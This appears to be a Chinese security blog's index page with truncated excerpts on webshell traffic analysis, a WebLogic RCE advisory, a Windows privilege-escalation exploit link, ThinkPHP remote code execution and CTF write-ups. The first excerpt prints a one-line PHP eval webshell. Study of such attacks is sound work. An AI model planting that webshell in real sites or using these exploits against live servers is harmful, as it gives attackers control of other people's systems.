1. 蚁剑流量分析 1. 环境如下 靶机 windows 2008 R2   攻击机器 win10 蚁剑2.0.4  1. 木马如下： <?php eval($_POST[1]) ?> 蚁剑编辑器有...

题目如下： http://xxx.xxx.xxx.xxx:/xxxx.php 过滤的如下关键词： xxxxxxxxx xxxxxxx xxxxxxx xxxxxxx xxxxxx xxxxxxx xxxxxxx xxxxxxxx ...

github: https://github.com/Liang2580/chunked-coding-converter jar 如下： 11111111

漏洞描述： 北京时间2018年10月17日，Oracle官方发布的10月关键补充更新CPU（重要补丁更新）中修复了一个高危的WebLogic远程代码执行漏洞（CVE-2018-3191）。 该漏洞允许未经身份验证的攻击者通过T3协...

代码审计----- xss   一个很小众的cms   无聊审计了一波。  具体的如下 最开始上个星期是弄错了点。导致一直卡在一个...

qqqqq   session

https://github.com/unamer/CVE-2018-8120 CVE-2018-8120 CVE-2018-8120 Windows LPE exploit Supports both x32 and x64. Tested on: Win7 x32, Win7 x64...

ThinkPHP 5.0.23 修复了一个代码执行的漏洞。之后Thinkphp 更新到5.0.24  这次代码执行的影响范围5.x <= 5.0.23   测试中我用的是5.0.23  安装...

Web 1.超简单 http://gxnnctf.gxsosec.cn:12311/    看NO参数，匹配正则，白名单且长度大于1就那么就会返回flag 传参/?NO=01 即得到flag    ...

2018 年12月10 日 ThinkPHP 官方发布安全更新，披露了一个高危漏洞。攻击者构造恶意代码，可以获取服务器权限。 受影响范围 版本 包括5.0 5.1 版本 大概受影响的CMS：FastAdmin ClTPHP 程序侠CMS 等.... 漏洞...